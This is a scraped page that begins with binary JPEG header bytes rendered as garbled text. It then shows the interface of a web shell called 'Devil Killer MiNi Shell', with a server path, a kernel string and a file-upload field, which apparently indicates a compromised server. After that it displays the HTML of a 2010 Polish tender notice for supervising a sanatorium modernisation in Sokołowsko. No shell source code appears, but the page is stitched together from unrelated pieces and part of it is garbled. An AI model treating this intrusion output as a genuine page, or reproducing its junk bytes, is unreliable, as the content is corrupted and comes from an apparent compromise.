JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100708/201302-N-2010.html

<p class="kh_header"><b>Mieroszów Sokołowsko: Pełnienie czynności inwestora zastępczego dla zadania inwestycyjnego p.n.: Modernizacja zabytkowego Sanatorium Zimowit wraz z rozbudową  bazy zabiegowej współfinansowanego 
z Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2007-2013</b><br>
<b>Numer ogłoszenia: 201302 - 2010; data zamieszczenia: 08.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sanatoria Dolnośląskie  sp. z o.o. , ul. Parkowa 3, 58-350 Mieroszów Sokołowsko, woj. dolnośląskie, tel. 0-74 8458391, faks 0-74 8458237.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie czynności inwestora zastępczego dla zadania inwestycyjnego p.n.: Modernizacja zabytkowego Sanatorium Zimowit wraz z rozbudową  bazy zabiegowej współfinansowanego 
z Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przed rozpoczęciem postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych  przeprowadzenie analiza/oceny dokumentacji projektowo - kosztorysowej przez osoby posiadające uprawnienia budowlane bez ograniczeń, m.in.:
-	w terminie 14 dni od daty przekazania Wykonawcy  dokumentacji projektowej wykonania analizy, w szczególności w zakresie kompletności dokumentacji oraz planowanej wartości zadania, 
-	sprawdzenia przedmiarów w oparciu o dostarczoną dokumentację techniczną, 
-	sprawdzenie zgodności specyfikacji technicznej wykonania i odbioru robót z dokumentacją projektową, kosztorysami i zakresem planowanego przedsięwzięcia
2)	Pełnienie funkcji biegłego w postępowaniu o udzielenie zamówienia publicznego (art. 21 ust. 4 ustawy prawo zamówień publicznych) na wykonanie robót budowlanych 
3)	Współpraca z Zamawiającym przy przygotowywaniu  dokumentacji przetargowej w zakresie dotyczącym warunków umowy, opisu przedmiotu zamówienia  na wykonanie robót budowlanych oraz wymagań jakie należy postawić wykonawcom w stosunku do zaplanowanej inwestycji
4)	Przygotowanie odpowiedzi na ewentualne pytania wykonawców robót budowlanych  dotyczących przedmiotu zamówienia,
5)	Prowadzenie nadzoru inwestorskiego przy realizacji Inwestycji w oparciu o dokumentację projektową, pozwolenie na budowę oraz z innymi obowiązującymi przepisami prawa
6)	Ustanowienie inspektorów nadzoru we wszystkich branżach ze wskazaniem inspektora nadzoru - koordynatora, zgodnie z art. 27 Ustawy Prawo Budowlane,
7)	Wykonywanie funkcji inspektora nadzoru zgodnie z przepisami ustawy Prawo budowlane
8)	Skompletowanie i przekazanie wykonawcy robót budowlanych pełnej dokumentacji umożliwiającej rozpoczęcie robót budowlanych m.in. dzienników budowy
9)	Przekazania Wykonawcy, przy udziale Zamawiającego terenu budowy -  zgodnie z przepisami prawa
10)	Zgłoszenie rozpoczęcia robót budowlanych  z zgodnie z obowiązującymi przepisami prawa
11)	Stałe monitorowanie i kontrola postępu robót, sprawdzanie ich rzeczywistego zaawansowania i zgodności realizacji z obowiązującym harmonogramem robót, 
12)	Wydawanie poleceń kierownikowi budowy 
13)	Bieżąca kontrola zgodności wykonania robót z zatwierdzoną dokumentacją projektową w zakresie wszystkich branż, pozwoleniami, przepisami prawa, polskimi normami oraz zasadami wiedzy technicznej
14)	Zgłaszanie Zamawiającemu uwag i zastrzeżeń do przebiegu prac i w takim przypadku zajmowanie pisemnie konkretnego stanowiska w tych sprawach oraz podejmowanie odpowiednich działań 
15)	Kontrola rozliczeń finansowych w tym: 
-	kontrola prawidłowości wystawiania faktur, zakresów prac i kwot, w zakresie zgodności dokumentów z umową zawartą z wykonawcą robót budowlanych, w tym także kontrola terminowych rozliczeń pomiędzy wykonawcą robót budowlanych a podwykonawcami, na których zatrudnienie Zamawiający wyraził zgodę,  
-	sprawdzanie faktur przejściowych i końcowych przedkładanych przez wykonawcę robót budowlanych, kwalifikowanie ich do zapłaty i przekazywanie ich Zamawiającemu do zapłaty, w terminach uzgodnionych z Zamawiającym, 
-	sprawdzanie kalkulacji (kosztorysów np. zamiennych) robót, 
-	dopilnowanie by koszty umowne inwestycji nie zostały przekroczone
16)	Współpraca z jednostką projektową i egzekwowanie wypełnienia czynności związanych z nadzorem autorskim,
17)	Uzgadnianie z jednostką projektową spraw związanych ze zmianami w projekcie,
18)	Prowadzenie narad roboczych, technicznych i koordynacyjnych na terenie budowy Inwestycji w tym szczególnie przeprowadzenie czynności odbiorowych, rozliczeń częściowych i końcowego 
19)	Występowanie w imieniu Zamawiającego przed organami administracji w sprawach wynikających z realizacji Inwestycji w granicach udzielonych pełnomocnictw,
20)	Udział w rozruchu
21)	Sprawdzenie i akceptacja dokumentacji powykonawczej oraz dokumentów dotyczących dokumentacji techniczno  - ruchowej urządzeń w tym ich kompletności, instrukcji użytkowania/obsługi urządzeń, instalacji wewnętrznej obiektów, terminarzu przeglądów i serwisowania, kart gwarancyjnych,
22)	Sprawdzenie i odbiór dokumentacji odbiorowej od wykonawcy robót budowlanych w celu dalszego przekazania jej Zamawiającemu,
23)	Powiadomienie wszystkich uczestników procesu inwestycyjnego o terminie odbioru końcowego Inwestycji;
24)	Udział w komisji odbioru końcowego zadania inwestycyjnego,
25)	Uzyskanie na rzecz Zamawiającego wszystkich wymaganych przepisami prawa decyzji administracyjnych, opinii, uzgodnień, stanowisk organów administracyjnych po zakończeniu procesu inwestycyjnego i uzyskanie ostatecznej  oraz bezwarunkowej decyzji o pozwoleniu na użytkowanie Inwestycji w tym:
-	przejęcie Dziennika Budowy wraz z prawidłowym wpisem kierownika budowy o zakończeniu robót i złożeniu stosownego oświadczenia w trybie art.57 Ustawy Prawo budowlane, 
-	przygotowanie dokumentów niezbędnych do zgłoszenia i odbioru budowy przez Państwową Inspekcję Sanitarną, Państwową Inspekcję Pracy, Państwową Straż Pożarną, oraz przez Państwowego Inspektora Nadzoru Budowlanego 
-	udział w kontroli budowy dokonywanej przez powyżej wymienione organy,
26)	Doprowadzenie do odbioru końcowego zadania inwestycyjnego i wspólnie z Zamawiającym podpisanie protokołu odbioru końcowego robót po uzyskaniu prawomocnego pozwolenia na użytkowanie inwestycji.
27)	Naliczanie w imieniu Zamawiającego kar umownych i/lub odszkodowań od wykonawcy robót budowlanych i  niezwłoczne, pisemne informowanie Zamawiającego o tym fakcie
28)	obsługa dokumentacyjna budowy, prowadzenie dokumentacji fotograficznej /cyfrowej/ budowy, poszczególnych jej etapów, w tym wszystkich odbiorów budowlanych, z pisemnym komentarzem dla Zamawiającego, 
29)	Archiwizacja korespondencji i dokumentacji wraz z przekazaniem ich Zamawiającemu w stanie kompletnym po zakończeniu Inwestycji lub rozwiązaniu niniejszej umowy,
30)	Rozliczenie końcowe zadania inwestycyjnego,
31)	Prowadzenie spraw związanych z okresem rękojmi i gwarancji na roboty budowlane polegające na dokonywaniu przeglądów obiektów 2 x w roku w tym:
-	sporządzenie harmonogramu przeglądu w okresie rękojmi i gwarancji i pisemne powiadomienie Stron o terminach przeglądów,
-	egzekwowanie usunięcia usterek i wad komisyjnie stwierdzonych w terminach wspólnie ustalonych, dokonanie odbioru usunięcia wad i usterek przy udziale Zamawiającego po pisemnym zgłoszeniu przez wykonawcę robót budowlanych gotowości do odbioru,
-	naliczanie kar umownych wykonawcy robót budowlanych za nieterminowe usunięcie wad lub usterek i przekazanie Zamawiającemu celem podjęcia ostatecznej decyzji, 
32)	Dokonanie odbioru pogwarancyjnego zadania inwestycyjnego - odbiór ostateczny
33)	przygotowanie elementów dokumentacji obowiązującej w procedurze dofinansowania w ramach RPO WD 2007-2013 z funduszy strukturalnych Unii Europejskiej oraz zgodnych z wytycznymi krajowymi i prawem wspólnotowym oraz Umową o dofinansowanie Projektu zawartego z  Dolnośląską Instytucją Zarządzającą (DIP)  w szczególności:
a.	opracowanie  harmonogramów płatności oraz harmonogramów rzeczowo finansowych  w okresie realizacji projektu i w terminach określonych przez DIP, w razie konieczności nanoszenie niezbędnych zmian w harmonogramach płatności oraz harmonogramach rzeczowo finansowych - w uzgodnieniu z Zamawiającym
b.	w  przypadku konieczności wprowadzenia zmian w Projekcie w trakcie jego realizacji oraz opracowywanie w formie pisemnej do DIP wniosku  o wprowadzenie zmian w Projekcie, przedstawiając ich zakres, przedmiot i uzasadnienie zgodnie z warunkami umowy o dofinansowanie projektu .
c.	uczestniczenie  w kontrolach przeprowadzanych przez DIP lub inną uprawnioną do tego instytucję oraz udzielanie niezbędnych wyjaśnień w trakcie realizacji projektu  w celu zbadania zgodności z wnioskiem o dofinansowanie Projektu i Umową o dofinansowanie zawartą z DIP,
d.	systematyczne  monitorowanie przebiegu realizacji Projektu oraz niezwłoczne informowania Zamawiającego o zaistniałych nieprawidłowościach lub problemach w realizacji Projektu  zgodnie z Umową o dofinansowanie
e.	pomiaru wartości wskaźników produktu osiągniętych dzięki realizacji Projektu, zgodnie ze wskaźnikami zamieszczonymi we wniosku o dofinansowanie,  zgodnie z Umową  o dofinansowanie projektu .
f.	udostępnienie i przekazywanie do DIP, po uzyskaniu akceptacji  Zamawiającego wszelkich dokumentów, danych, informacji i wyjaśnień dotyczących realizacji Projektu, w tym także na potrzeby ewaluacji Programu, których Instytucja Zarządzająca Programem zażąda w trakcie realizacji Projektu zgodnie z Umową o dofinansowanie projektu .      
g.	współpracy z audytorem i Zamawiającym w zakresie umożliwiającym :
-	potwierdzenie wiarygodności danych ,zarówno liczbowych jak i opisowych dotyczących zdarzeń przeszłych związanych z osiągnięciem celów projektu, zawartych w przedstawionych przez Zamawiającego  dokumentach związanych z realizowanym projektem 
-	potwierdzenie realizacji wydatków i uzyskania założonych efektów zgodnie z wymaganiami zawartymi we wniosku o dofinansowanie  i umowie o dofinansowanie 
-	potwierdzenie poprawnego sposobu udokumentowania i ewidencyjnego wyodrębnienia rzeczywistych operacji gospodarczych związanych z realizowanym projektem 
34)	Wszelkie tworzone dokumenty Wykonawca przekazuje Zamawiającemu w wersji elektronicznej oraz w wersji papierowej w ilości 2 egzemplarzy, 
35)	Wszelka wytworzona przez Wykonawcę dokumentacja w czasie realizacji Projektu będzie znajdowała się na stałe w siedzibie Zamawiającego, w miejscu przez niego wyznaczonym,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	oświadczenie o spełnieniu tego warunku - wg załącznik nr 2a do siwz
( w wypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub
więcej Wykonawców oświadczenia musza być złożone (podpisane) przez
Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia, lub złożone
(podpisane) wspólnie/łącznie przez każdego z Wykonawców składających ofertę wspólną)

b.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust.1 pkt 2 Ustawy Pzp. sporządzone wg wzoru stanowiącego załącznik nr 2b do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	oświadczenie o spełnieniu tego warunku - wg załącznik nr 2a do siwz
( w wypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub
więcej Wykonawców przedmiotowe oświadczenia musza być złożone (podpisane) przez
Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia, lub złożone
(podpisane) wspólnie/łącznie przez każdego z Wykonawców składających ofertę wspólną)

b.	przedstawienie dokumentu, że w okresie  ostatnich 3 lat przed upływem terminu składania ofert (lub w okresie prowadzenia działalności jeżeli jest on krótszy niż trzy lata) wykonał  minimum trzy usługi, których przedmiotem było pełnienie czynności inwestora zastępczego/kierownika projektu/inżyniera kontraktu w realizacji inwestycji związanych z budową lub remontem o zakresie robót odpowiadających  przedmiotowi zamówienia minimum 2  obiektów o kubaturze min 4000 m3, przeznaczonych  na prowadzenie usług sanatoryjnych, szpitalnych lub hotelarskich o wartości min 2 mln zł każdy- zgodnie ze wzorem załącznika nr 2c do siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c.	wykonawca musi dysponować zespołem osób - załącznik nr 2d:
i.	do oceny/analizy projektu posiadających uprawnienia budowlane w niżej wymienionych specjalnościach; odpowiednie,  wskazane poniżej doświadczenie zawodowe: 
	specjalność konstrukcyjno - budowlana bez ograniczeń;  doświadczenie zawodowe w projektowaniu min 3 lata
	specjalność instalacyjna w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń; doświadczenie zawodowe w projektowaniu: 3 lata
	specjalność: instalacyjna w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń; doświadczenie zawodowe w projektowaniu: 3 lata

ii.	do oceny/analizy projektu
	jedną osobą  posiadającą udokumentowane doświadczenie przy zakładaniu okablowania strukturalnego i instalacji telewizji przemysłowej w co najmniej 2 obiektach o kubaturze min. 4000 m3 

iii.	po jednej osobie posiadającej uprawnienia budowlane do nadzorowania robotami budowlanymi w niżej wymienionych specjalnościach i wskazane poniżej doświadczenie zawodowe:
	specjalność konstrukcyjno - budowlana bez ograniczeń; doświadczenie zawodowe na stanowisku inspektora nadzoru: 5 lat 
specjalność instalacyjna w zakresie sieci, instalacji i urządzeń cieplnych gazowych, wodociągowych i kanalizacyjnych bez ograniczeń; doświadczenie zawodowe na stanowisku inspektora nadzoru: 3 lata
 specjalność instalacyjna w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń; doświadczenie zawodowe na stanowisku inspektora nadzoru: 3 lata
iv.	jedną osobą  posiadającą minimum 2 letnie doświadczenie we współpracy z Instytucjami Zarządzającymi Programami finansowanymi z UE 2007-2013 przy  rozliczaniu  robót budowlanych, przy czym zakres współpracy powinien odpowiadać zakresowi opisanemu w siwz III p.2 ppkt 33)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	oświadczenie o spełnieniu tego warunku - wg załącznik nr 2a do siwz ( w wypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców przedmiotowe oświadczenia musza być złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia, lub złożone (podpisane) wspólnie/łącznie przez każdego z Wykonawców składających ofertę wspólną</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania niniejszego zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia sporządzone wg wzoru stanowiącego załącznik 4a - 4c do siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
